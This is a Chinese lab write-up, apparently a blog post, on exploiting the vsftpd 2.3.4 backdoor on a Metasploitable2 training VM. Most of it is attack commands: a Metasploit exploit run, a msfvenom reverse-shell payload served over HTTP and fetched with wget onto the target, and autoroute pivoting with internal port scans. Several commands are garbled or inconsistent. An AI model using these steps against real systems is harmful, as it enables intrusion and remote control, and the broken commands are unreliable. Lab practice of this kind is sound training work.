Metasploitable2靶机之第六篇--Vsftpd源码包后门漏洞

环境

描述

原理

影响版本

漏洞复现

第一部分 漏洞利用
第一步 ,启动metasploit
msfconsole

在这里插入图片描述

第二步选择漏洞库
search vsftp
use exploit/unix/ftp/vsftpd_234_backdoor

在这里插入图片描述

第三步 设置参数,开始攻击
show options
Set RHOST 192.168.232.202 设置要攻击的机器IP
run

在这里插入图片描述

第四步 利用成功,执行命令
验证 python -c ‘import pty;pty.spawn("/bin/sh")’
whaomi
id
ls

在这里插入图片描述

第二部分 反弹shell远程连接
第一步 生成反弹shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.232.128 LPORT=4444 -f elf > backdoor.elf

在这里插入图片描述

第二步 启动本地Apache服务,并将backdoor.elf放置到服务器中
service apache2 start
mv backdoor.elf /var/www/html/

在这里插入图片描述

第三步 在目标主机上下载shell
wget http://192.168.232.198/backdoor.elf

在这里插入图片描述

第四步 在msf终端上执行
msfconsoleuse exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 47.94.0.221
set LPORT 4444
exploit

在这里插入图片描述

第五步 在目标机上运行木马文件
chmod 7777 backdoor.elf./backdoor.elf

在这里插入图片描述

第六步 查看反弹的Meterpreter终端

在这里插入图片描述

第三部分 内网信息收集
第一步 查看ARP内容

在这里插入图片描述

第二步 设置跳板,使用autoroute命令来设置跳板
run autoroute -prun autoroute -s 192.168.232.0 255.255.255.0
run autoroute -p

在这里插入图片描述

第三步 将Meterpreter会话切换到后台
background
sessions

在这里插入图片描述

第四步 内网主机端口扫描
use auxiliary/scanner/portscan/tcpshow options
set RHOSTS 192.168.232.129
run

在这里插入图片描述

第五步 验证192.168.232.129的80端口开放
use auxiliary/scanner/http/http_versionshow options
set RHOSTS 192.168.109.159
run

在这里插入图片描述

摘抄


活着,就是为了在一片沙漠中,

寻找海市蜃楼般的快乐,

然后让荒芜的土地上,开满希望之花。

– 三毛


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星球守护者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值